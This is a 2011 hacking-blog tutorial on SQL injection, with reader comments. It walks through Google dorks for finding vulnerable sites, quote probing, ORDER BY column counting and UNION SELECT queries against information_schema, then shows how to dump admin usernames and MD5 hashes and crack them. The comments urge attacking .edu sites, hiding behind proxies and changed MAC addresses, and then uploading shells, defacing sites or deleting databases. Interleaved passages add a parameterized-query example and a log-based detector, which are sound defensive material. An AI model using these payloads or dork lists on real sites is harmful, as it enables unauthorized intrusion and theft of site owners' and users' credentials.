
Friday, May 27, 2011

Chapter 12 : SQL Injection (Site Hacking)


Up till now we have seen a few terms related to hacking and some methods to hack passwords, like phishing and keyloggers. Now we are moving a little further. In this thread I am going to post something about SQL INJECTION. It is a type of attack with the help of which sites can be hacked (mostly newly launched sites and educational sites).

OK buddies, let's start. Kindly pay attention and let your mind think; it's just child's play.

1) Search for a vulnerable site.

Highlight one of the strings below, press Ctrl+C, then press Ctrl+V in the Google search box.

  • allinurl:index.php?id=
  • allinurl:trainers.php?id=
  • allinurl:buy.php?category=
  • allinurl:article.php?ID=
  • allinurl:play_old.php?id=
  • allinurl:newsitem.php?num=
  • allinurl:readnews.php?id=
  • allinurl:top10.php?cat=
  • allinurl:historialeer.php?num=
  • allinurl:reagir.php?num=
  • allinurl:Stray-Questions-View.php?num=
  • allinurl:forum_bds.php?num=
  • allinurl:game.php?id=
  • allinurl:view_product.php?id=
  • allinurl:newsone.php?id=
  • allinurl:sw_comment.php?id=
  • allinurl:news.php?id=
  • allinurl:avd_start.php?avd=
  • allinurl:event.php?id=
  • allinurl:product-item.php?id=
  • allinurl:sql.php?id=
  • allinurl:news_view.php?id=
  • allinurl:select_biblio.php?id=
  • allinurl:humor.php?id=
  • allinurl:aboutbook.php?id=
  • allinurl:ogl_inet.php?ogl_id=
  • allinurl:fiche_spectacle.php?id=
  • allinurl:communique_detail.php?id=
  • allinurl:sem.php3?id=
  • allinurl:kategorie.php4?id=
  • allinurl:faq2.php?id=
  • allinurl:show_an.php?id=
  • allinurl:preview.php?id=
  • allinurl:loadpsb.php?id=
  • allinurl:opinions.php?id=
  • allinurl:spr.php?id=
  • allinurl:pages.php?id=
  • allinurl:announce.php?id=
  • allinurl:clanek.php4?id=
  • allinurl:participant.php?id=
  • allinurl:download.php?id=
  • allinurl:main.php?id=
  • allinurl:review.php?id=
  • allinurl:chappies.php?id=
  • allinurl:read.php?id=
  • allinurl:prod_detail.php?id=
  • allinurl:viewphoto.php?id=
  • allinurl:article.php?id=
  • allinurl:person.php?id=
  • allinurl:productinfo.php?id=
  • allinurl:showimg.php?id=
  • allinurl:view.php?id=
  • allinurl:website.php?id=
  • allinurl:hosting_info.php?id=
  • allinurl:gallery.php?id=
  • allinurl:rub.php?idr=
  • allinurl:view_faq.php?id=
  • allinurl:artikelinfo.php?id=
  • allinurl:detail.php?ID=
  • allinurl:index.php?=
  • And this one is just priceless: "login: *" "password= *" filetype:xls

2) Definitions:


inurl: is a search operator in Google that restricts results to pages whose URL contains the given text.
.php?id= is what I'm searching for in a URL; SQL injection works by adding code after the = symbol. Such a search string is commonly referred to as a dork.
Dork definition: it's the part of the site's URL that tells you it may be vulnerable to a certain SQL injection. Let's take this exploit as an example:
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
We will check a site's vulnerability by adding a magic quote (') at the end of the URL.

3) So the URL will look like this:


http://www.site.com/news_archive.php?id=5'
Press Enter, and we get this result:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you get an error, some missing text or a blank page, the site is probably vulnerable, but that is not guaranteed.
In our case we now know that the site is vulnerable.
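As an added illustration (not code from the original post), here is the pattern behind the error message above, written in Python with an in-memory SQLite database standing in for the site's MySQL backend. The vulnerable query pastes the id parameter straight into the SQL text, so a stray quote breaks the statement and a crafted value changes it; the hardened version validates the type and binds it as a parameter. The table names and rows are constructed to mirror the tutorial, and SQLite's error text differs from MySQL's, but the cause is identical.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema mirroring the tables named in the tutorial."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE NewsArticle (NewsID INTEGER, Title TEXT);
        INSERT INTO NewsArticle VALUES (5, 'Welcome'), (6, 'Update');
        CREATE TABLE auth_user_md5 (Username TEXT, Password TEXT);
        INSERT INTO auth_user_md5 VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    # The flaw behind the tutorial's error page: the URL value becomes part of
    # the SQL text, so quotes and keywords are parsed as SQL, not as data.
    sql = f"SELECT * FROM NewsArticle WHERE NewsID={raw_id}"
    return conn.execute(sql).fetchall()


def fetch_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    # Hardened form: check the value is an integer, then bind it as a parameter.
    # The database only ever sees one fixed statement plus one integer value.
    if not raw_id.lstrip("-").isdigit():
        raise ValueError("NewsID must be an integer")
    sql = "SELECT * FROM NewsArticle WHERE NewsID=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def probe(func, conn: sqlite3.Connection, raw_id: str) -> tuple:
    """Run one input through a fetch function and report what happened."""
    try:
        return ("rows", func(conn, raw_id))
    except sqlite3.OperationalError as exc:   # syntax error: the quote probe
        return ("sql_error", str(exc))
    except ValueError as exc:                 # rejected by input validation
        return ("rejected", str(exc))
```

Running `probe` with the same three inputs (`"6"`, `"5'"`, and the UNION string from step 9) against both functions shows the vulnerable one erroring and then leaking auth_user_md5 rows, while the safe one returns the article for `"6"` and rejects the other two.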

4) Find the columns:

The next step is to find out how many columns the table contains.
To find it we use "order by" (without the quotes) followed by the comment string " -- " (no quotes).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
We move a little higher (the step size doesn't matter).
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we get an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
Now we get an error on this column; it will look like this:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
This means the table has only 14 columns.

5) Union select:

Now use "-" (a minus sign, which makes the id negative so the original row is not returned) together with a union select statement.
Using this we can select more data in one SQL statement.
It looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
Press Enter, and numbers appear, like this:
6
, 5
8

6) Check the MySQL version

Now we will check its MySQL version. We put @@version in place of one of the numbers that appeared in the previous step.
Say I choose 8: we replace 8 with @@version, so it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <-- this is the version

7) Getting the table names.

We use group_concat(table_name).
Replace @@version with group_concat(table_name)
so it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
We're not done yet (don't press Enter): between the number 14 and the trailing "--" insert this:
+from+information_schema.tables+where+table_schema=database()--
It will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
Press Enter and we get this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5

8) Column names:


Now that we're done with the TABLE NAME, we move on to the COLUMN NAME.
Use the string group_concat(column_name):
replace group_concat(table_name) with group_concat(column_name).
But before that we must choose one table. I choose auth_user_md5 because this is the one we want.
For better results we need to hex-encode auth_user_md5.
Go to this link: http://home2.paulschou.net/tools/xlate/
Paste auth_user_md5 into the text box and click encode.
Now we get the hex of auth_user_md5; it looks like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
Before proceeding, remove the spaces between the numbers, like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) with group_concat(column_name),
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
Also replace +from+information_schema.tables+where+table_schema=database()--
with
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
(The digits after 0x are the auth_user_md5 hex we encoded.)
Note: always add 0x before the hex, as above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
Now press Enter, and you get a result like this:
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddress,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status

9) Main part:

We use 0x3a (the hex of a colon, used as a separator) to obtain what we want from the DATABASE, like passwords, usernames, etc.
Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3a,Status)
but I prefer group_concat(Username,0x3a,Password) for less effort.
Also replace +from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5, so we replace it.
The result looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
I press Enter and we get this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d

10) Cracking the password:

Because the password is an MD5 hash we need to crack it.
http://passcracking.com/index.php
pass: x1R0zYB3bex
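Added here as an example (not part of the original post): detection logic, in Python, that flags the request shapes used in steps 3 to 9 when run over web-server access logs, after undoing the %xx and "+" encoding the browser applies. The log lines are constructed for the example and the indicator names are my own; the regexes are deliberately narrow to the forms shown on this page, so a real deployment would tune them.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators taken from the request shapes the tutorial walks through: quote
# probe, ORDER BY enumeration, UNION SELECT, @@version, information_schema,
# group_concat and 0x hex literals. Names are my own.
INDICATORS = [
    ("quote_probe", re.compile(r"=\s*-?\d+'(\s|$|&)")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union_select", re.compile(r"\bunion(\s+all)?\s+select\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version", re.I)),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}", re.I)),
]

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decoded_query(target: str) -> str:
    """Query string with %xx and '+' undone, so 'union+select' and %27 become visible."""
    return unquote_plus(urlsplit(target).query)


def flag_sqli(line: str):
    """Parse one log line; None if unparseable, else ip, status and indicators hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = decoded_query(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(q)]
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits}


def scan(lines):
    """Keep only entries that tripped at least one indicator, in input order."""
    flagged = []
    for line in lines:
        r = flag_sqli(line)
        if r and r["hits"]:
            flagged.append(r)
    return flagged


# Constructed sample lines (not real traffic) mirroring steps 3, 4 and 8 above.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2011:10:00:01 +0000] "GET /news_archive.php?id=5 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/May/2011:10:00:05 +0000] "GET /news_archive.php?id=5%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/May/2011:10:00:09 +0000] "GET /news_archive.php?id=6+order+by+15-- HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/May/2011:10:00:14 +0000] "GET /news_archive.php?id=-6+union+select+1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]
```

`scan(SAMPLE_LOG)` leaves the ordinary request alone and returns the other three, each with the indicators it tripped; the same client IP hitting several of these stages in sequence is the pattern worth alerting on.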



About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I have been blogging since 2009; before that I just searched for things, and now I am sharing my knowledge through this platform. I'm also a freelance writer on topics related to website hacking, website optimization (SEO), Blogger customizations and making money online.


29 comments:

where can i find a real hacker to communicate

In social networking sites or
where......................................

There are lots of great hackers on facebook ..... u can talk to them or if u wanna talk to me then add me on facebook ..... :))

But the real thing is no one will teach u , if u really want to learn hacking then read tutorials .... net is the best teacher

@Anonymous you have to try hard to get the column number, like try each number from 1 until you get the column number ..... it may be on 10 or may be 100

and I will suggest that before doing column search first make it confirm that the site is vulnerable bcoz if its not then u can find the column no and its better to try sql on some .edu site bcoz they are mostly vulnerable to sql ....

thanx xeo, this thing is really simple and easy to understand, u really explained well, took me not more than 30mins to practice it.

Sheharyar Good to know that u got this tutorial .... I always tried my best to make tutorial as simple as possible .... one more thing take much care while doing this attack as its really toxic and may cause u severe loss .... :))

well i just learnt getting d login n passwords, that too not to threaten anyone just for learning, n btw wat kind of losses can it cause me?

also explain wat all can we do after getting d login n password? how much authority we get with that login n password?

@Sheharyar whenever you try to hack some website make sure that u r undetectable i.e use proxy , also change your mac address , these things are really necessary as if you get caught you will be severely punished as hacking is a crime ....

after getting login and password u may upload shell in it or can deface it .... delete its database can do anything to it ....

use google dorks and then add ' to find is it vulnerable or not u will easily find such sites

i want 2 work on it , but what 2 do 1st thing i dont understand following words & the long list in first point......


"1). Search for a vulnerable site.

Highlight one then press ctrl+c then ctrl+v at google search engine."

what is list for & i have not seen such .php?id= in common
sites....

@ john copy one dork from the given dorks in first step and paste them in google search engine and hit enter and then you will get a lots of vulnerable sites .... not open any one and check whether its vulnerable or not

hi XEO i have some question about websites for you:
i know a website with 2 columns only. how can i apply @@version and the other things ?
2- i know a porn website that i wanna hack, i added ' and it gave me an error but when i tried to know how many columns it has , i found that it has unlimited columns ? what to do in this case ?
3- how can i find the admin page to connect with admin name and password ??...plz answer me


no I got the password, how do I "log in" to the page?
this sounds kinda nooby, but please, help me!
